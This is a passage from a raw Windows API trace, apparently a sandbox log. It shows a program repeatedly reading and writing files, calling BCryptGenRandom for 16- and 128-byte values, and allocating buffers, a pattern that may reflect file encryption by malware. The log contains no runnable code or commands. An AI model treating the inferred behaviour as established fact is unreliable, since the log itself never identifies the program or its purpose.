lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0197.432] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0197.432] CloseHandle (hObject=0x170) returned 1 [0197.433] free (_Block=0x3df0008) [0197.433] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0197.454] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0197.455] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0197.455] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0197.455] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0197.455] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0197.455] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0197.455] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0197.455] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0197.455] free (_Block=0x3e305b8) [0197.455] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0197.455] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0197.456] free (_Block=0x1fa91d0) [0197.456] free (_Block=0x1fa2ed8) [0197.456] free (_Block=0x1fa90b8) [0197.456] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0197.456] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0197.456] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0xed0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0197.457] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0197.468] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x4ffa, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0197.472] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0197.485] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x4dc6, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0197.487] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0197.497] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x62e3, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0197.499] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0197.510] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x7876, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0197.512] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0197.523] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x30e4, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0197.524] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0197.525] CloseHandle (hObject=0x170) returned 1 [0197.525] free (_Block=0x3df0008) [0197.525] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0197.534] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0197.534] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0197.534] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0197.534] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0197.535] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0197.535] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0197.535] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0197.535] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0197.535] free (_Block=0x3e305b8) [0197.535] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0197.535] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0197.536] free (_Block=0x1fa91d0) [0197.536] free (_Block=0x1fa2ed8) [0197.536] free (_Block=0x1fa90b8) [0197.536] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0197.536] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0197.537] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x2450, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0197.537] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0197.548] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x2a12, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0197.549] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0197.549] CloseHandle (hObject=0x170) returned 1 [0197.550] free (_Block=0x3df0008) [0197.550] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0197.558] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0197.559] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0197.559] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0197.559] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0197.559] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0197.559] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0197.559] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0197.559] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0197.559] free (_Block=0x3e305b8) [0197.559] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0197.559] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0197.560] free (_Block=0x1fa91d0) [0197.560] free (_Block=0x1fa2ed8) [0197.560] free (_Block=0x1fa90b8) [0197.560] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0197.560] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0197.561] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x9590, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0197.561] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0197.706] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x3452, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0197.707] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0197.719] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x9e0, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0197.719] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0197.719] CloseHandle (hObject=0x170) returned 1 [0197.719] free (_Block=0x3df0008) [0197.720] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0197.727] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0197.728] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0197.728] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0197.728] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0197.728] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0197.728] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0197.728] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0197.728] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0197.728] free (_Block=0x3e305b8) [0197.728] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0197.728] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0197.729] free (_Block=0x1fa91d0) [0197.729] free (_Block=0x1fa2ed8) [0197.729] free (_Block=0x1fa90b8) [0197.729] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0197.729] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0197.729] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x9d0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0197.729] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0197.740] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0xb21e, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0197.741] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0197.754] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x76ea, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0197.755] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0197.769] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x7148, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0197.770] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0197.771] CloseHandle (hObject=0x170) returned 1 [0197.771] free (_Block=0x3df0008) [0197.771] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0197.780] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0197.780] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0197.780] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0197.780] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0197.781] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0197.781] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0197.781] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0197.781] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0197.781] free (_Block=0x3e305b8) [0197.781] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0197.781] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0197.781] free (_Block=0x1fa91d0) [0197.781] free (_Block=0x1fa2ed8) [0197.781] free (_Block=0x1fa90b8) [0197.781] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x612, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0197.782] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0197.783] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x20d0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0197.783] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0197.793] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x998, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0197.794] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0197.794] CloseHandle (hObject=0x170) returned 1 [0197.794] free (_Block=0x3df0008) [0197.794] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0197.803] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0197.804] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0197.804] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0197.804] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0197.804] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0197.804] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0197.805] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0197.805] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0197.805] free (_Block=0x3e305b8) [0197.805] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0197.805] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0197.805] free (_Block=0x1fa91d0) [0197.805] free (_Block=0x1fa2ed8) [0197.805] free (_Block=0x1fa90b8) [0197.805] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x616, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0197.805] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0197.806] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x5c0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0197.806] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0197.818] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x766, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0197.818] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0197.818] CloseHandle (hObject=0x170) returned 1 [0197.818] free (_Block=0x3df0008) [0197.818] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0197.827] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0197.827] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0197.827] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0197.827] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0197.828] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0197.828] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0197.828] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0197.828] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0197.828] free (_Block=0x3e305b8) [0197.828] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0197.828] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0197.829] free (_Block=0x1fa91d0) [0197.829] free (_Block=0x1fa2ed8) [0197.829] free (_Block=0x1fa90b8) [0197.829] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x616, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0197.829] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0197.829] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x790, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0197.829] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0197.842] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x88e, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0197.842] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0197.842] CloseHandle (hObject=0x170) returned 1 [0197.842] free (_Block=0x3df0008) [0197.842] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0197.851] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0197.852] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0197.852] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 